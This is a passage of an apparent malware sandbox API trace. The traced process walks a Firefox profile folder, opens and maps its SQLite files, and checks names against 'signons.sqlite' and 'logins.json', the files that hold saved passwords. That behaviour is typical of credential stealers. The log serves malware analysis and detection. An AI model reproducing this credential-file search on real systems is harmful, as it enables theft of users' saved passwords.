dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.865] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.865] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.865] CloseHandle (hObject=0x668) returned 1 [0589.865] CloseHandle (hObject=0x660) returned 1 [0589.865] LocalFree (hMem=0x56c300) returned 0x0 [0589.865] LocalFree (hMem=0x56afc8) returned 0x0 [0589.865] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.865] lstrlenW (lpString="\\") returned 1 [0589.865] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.865] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.865] lstrlenW (lpString="extensions.sqlite") returned 17 [0589.865] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.865] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56afc8 [0589.865] LocalFree (hMem=0x578c30) returned 0x0 [0589.865] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.866] CloseHandle (hObject=0x660) returned 1 [0589.866] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5e [0589.866] LocalAlloc (uFlags=0x40, uBytes=0x13c) returned 0x56c300 [0589.866] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite", lpDst=0x56c300, nSize=0x5e | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite") returned 0x5e [0589.866] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.866] CloseHandle (hObject=0x660) returned 1 [0589.866] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.866] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x70000 [0589.866] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.866] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3680000 [0589.868] UnmapViewOfFile (lpBaseAddress=0x3680000) returned 1 [0589.870] CloseHandle (hObject=0x668) returned 1 [0589.870] CloseHandle (hObject=0x660) returned 1 [0589.870] LocalFree (hMem=0x56c300) returned 0x0 [0589.870] LocalFree (hMem=0x56afc8) returned 0x0 [0589.870] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.870] lstrlenW (lpString="\\") returned 1 [0589.870] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.870] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.870] lstrlenW (lpString="formhistory.sqlite") returned 18 [0589.870] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.871] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56afc8 [0589.871] LocalFree (hMem=0x578c30) returned 0x0 [0589.871] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.871] CloseHandle (hObject=0x660) returned 1 [0589.871] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0589.871] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56c300 [0589.871] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite", lpDst=0x56c300, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite") returned 0x5f [0589.871] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.871] CloseHandle (hObject=0x660) returned 1 [0589.871] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.871] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x30000 [0589.871] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.871] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0589.872] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0589.873] CloseHandle (hObject=0x668) returned 1 [0589.873] CloseHandle (hObject=0x660) returned 1 [0589.873] LocalFree (hMem=0x56c300) returned 0x0 [0589.873] LocalFree (hMem=0x56afc8) returned 0x0 [0589.873] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.873] lstrcmpiW (lpString1="healthreport", lpString2=".") returned 1 [0589.873] lstrcmpiW (lpString1="healthreport", lpString2="..") returned 1 [0589.873] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.873] lstrlenW (lpString="\\") returned 1 [0589.873] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.873] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.873] lstrlenW (lpString="healthreport") returned 12 [0589.873] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.873] LocalAlloc (uFlags=0x40, uBytes=0x132) returned 0x56afc8 [0589.873] LocalFree (hMem=0x578c30) returned 0x0 [0589.873] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0589.873] lstrlenW (lpString="\\*.*") returned 4 [0589.873] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport") returned 88 [0589.873] LocalAlloc (uFlags=0x40, uBytes=0x13a) returned 0x56c300 [0589.873] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport\\*.*", lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 0x5b9b50 [0589.874] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.874] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0589.874] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.874] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.874] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 0 [0589.874] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0589.874] LocalFree (hMem=0x56c300) returned 0x0 [0589.874] LocalFree (hMem=0x56afc8) returned 0x0 [0589.874] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.874] lstrlenW (lpString="\\") returned 1 [0589.874] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.874] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.874] lstrlenW (lpString="healthreport.sqlite") returned 19 [0589.874] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.874] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56afc8 [0589.874] LocalFree (hMem=0x578c30) returned 0x0 [0589.874] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.874] CloseHandle (hObject=0x660) returned 1 [0589.874] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x60 [0589.874] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0x56c300 [0589.874] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite", lpDst=0x56c300, nSize=0x60 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite") returned 0x60 [0589.874] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.874] CloseHandle (hObject=0x660) returned 1 [0589.874] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0589.874] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x118000 [0589.874] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0589.874] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0589.879] UnmapViewOfFile (lpBaseAddress=0x3800000) returned 1 [0589.887] CloseHandle (hObject=0x668) returned 1 [0589.887] CloseHandle (hObject=0x660) returned 1 [0589.887] LocalFree (hMem=0x56c300) returned 0x0 [0589.887] LocalFree (hMem=0x56afc8) returned 0x0 [0589.887] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52db14 | out: lpFindFileData=0x52db14) returned 1 [0589.887] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0589.887] lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0589.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.887] lstrlenW (lpString="\\") returned 1 [0589.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0589.887] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x578c30 [0589.887] lstrlenW (lpString="indexedDB") returned 9 [0589.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0589.887] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x5e1d10 [0589.887] LocalFree (hMem=0x578c30) returned 0x0 [0589.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0589.887] lstrlenW (lpString="\\*.*") returned 4 [0589.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0589.887] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56afc8 [0589.887] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\*.*", lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 0x5b9b50 [0589.887] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.887] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0589.887] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.887] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.887] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d89c | out: lpFindFileData=0x52d89c) returned 1 [0589.887] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0589.887] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0589.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0589.887] lstrlenW (lpString="\\") returned 1 [0589.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB") returned 85 [0589.887] LocalAlloc (uFlags=0x40, uBytes=0x12e) returned 0x578c30 [0589.887] lstrlenW (lpString="moz-safe-about+home") returned 19 [0589.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\") returned 86 [0589.887] LocalAlloc (uFlags=0x40, uBytes=0x154) returned 0x5e1e48 [0589.887] LocalFree (hMem=0x578c30) returned 0x0 [0589.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.887] lstrlenW (lpString="\\*.*") returned 4 [0589.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.887] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x578c30 [0589.887] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 0x5b9b10 [0589.888] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.888] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 1 [0589.888] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.888] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.888] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 1 [0589.888] lstrlenW (lpString="\\") returned 1 [0589.888] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.888] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x5a2988 [0589.888] lstrlenW (lpString=".metadata") returned 9 [0589.888] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0589.888] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x5a2ae8 [0589.888] LocalFree (hMem=0x5a2988) returned 0x0 [0589.888] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0589.888] CloseHandle (hObject=0x66c) returned 1 [0589.888] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x74 [0589.888] LocalAlloc (uFlags=0x40, uBytes=0x168) returned 0x5f0230 [0589.888] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata", lpDst=0x5f0230, nSize=0x74 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata") returned 0x74 [0589.888] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0589.888] CloseHandle (hObject=0x66c) returned 1 [0589.888] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\.metadata" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\.metadata"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x66c [0589.888] GetFileSize (in: hFile=0x66c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0589.888] CreateFileMappingW (hFile=0x66c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0589.888] CloseHandle (hObject=0x66c) returned 1 [0589.888] LocalFree (hMem=0x5f0230) returned 0x0 [0589.888] StrStrIW (lpFirst=".metadata", lpSrch="signons.sqlite") returned 0x0 [0589.888] StrStrIW (lpFirst=".metadata", lpSrch="logins.json") returned 0x0 [0589.888] LocalFree (hMem=0x5a2ae8) returned 0x0 [0589.888] FindNextFileW (in: hFindFile=0x5b9b10, lpFindFileData=0x52d624 | out: lpFindFileData=0x52d624) returned 1 [0589.888] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0589.888] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0589.888] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.888] lstrlenW (lpString="\\") returned 1 [0589.888] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home") returned 105 [0589.888] LocalAlloc (uFlags=0x40, uBytes=0x156) returned 0x5a2988 [0589.888] lstrlenW (lpString="idb") returned 3 [0589.888] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\") returned 106 [0589.888] LocalAlloc (uFlags=0x40, uBytes=0x15c) returned 0x5a2ae8 [0589.888] LocalFree (hMem=0x5a2988) returned 0x0 [0589.889] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.889] lstrlenW (lpString="\\*.*") returned 4 [0589.889] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.889] LocalAlloc (uFlags=0x40, uBytes=0x164) returned 0x5f0230 [0589.889] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x52d3ac | out: lpFindFileData=0x52d3ac) returned 0x5b9bd0 [0589.889] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.889] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d3ac | out: lpFindFileData=0x52d3ac) returned 1 [0589.889] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.889] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.889] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d3ac | out: lpFindFileData=0x52d3ac) returned 1 [0589.889] lstrcmpiW (lpString1="818200132aebmoouht", lpString2=".") returned 1 [0589.889] lstrcmpiW (lpString1="818200132aebmoouht", lpString2="..") returned 1 [0589.889] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.889] lstrlenW (lpString="\\") returned 1 [0589.889] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.889] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x5f03a0 [0589.889] lstrlenW (lpString="818200132aebmoouht") returned 18 [0589.889] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0589.889] LocalAlloc (uFlags=0x40, uBytes=0x182) returned 0x5f0508 [0589.889] LocalFree (hMem=0x5f03a0) returned 0x0 [0589.889] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0589.889] lstrlenW (lpString="\\*.*") returned 4 [0589.889] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht") returned 128 [0589.889] LocalAlloc (uFlags=0x40, uBytes=0x18a) returned 0x5f0698 [0589.889] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht\\*.*", lpFindFileData=0x52d134 | out: lpFindFileData=0x52d134) returned 0x5b9b90 [0589.889] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0589.889] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d134 | out: lpFindFileData=0x52d134) returned 1 [0589.889] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0589.889] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0589.889] FindNextFileW (in: hFindFile=0x5b9b90, lpFindFileData=0x52d134 | out: lpFindFileData=0x52d134) returned 0 [0589.889] FindClose (in: hFindFile=0x5b9b90 | out: hFindFile=0x5b9b90) returned 1 [0589.889] LocalFree (hMem=0x5f0698) returned 0x0 [0589.889] LocalFree (hMem=0x5f0508) returned 0x0 [0589.889] FindNextFileW (in: hFindFile=0x5b9bd0, lpFindFileData=0x52d3ac | out: lpFindFileData=0x52d3ac) returned 1 [0589.889] lstrlenW (lpString="\\") returned 1 [0589.889] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb") returned 109 [0589.889] LocalAlloc (uFlags=0x40, uBytes=0x15e) returned 0x5f03a0 [0589.889] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0589.889] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 110 [0589.889] LocalAlloc (uFlags=0x40, uBytes=0x190) returned 0x5f0508 [0589.889] LocalFree (hMem=0x5f03a0) returned 0x0 [0589.889] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: 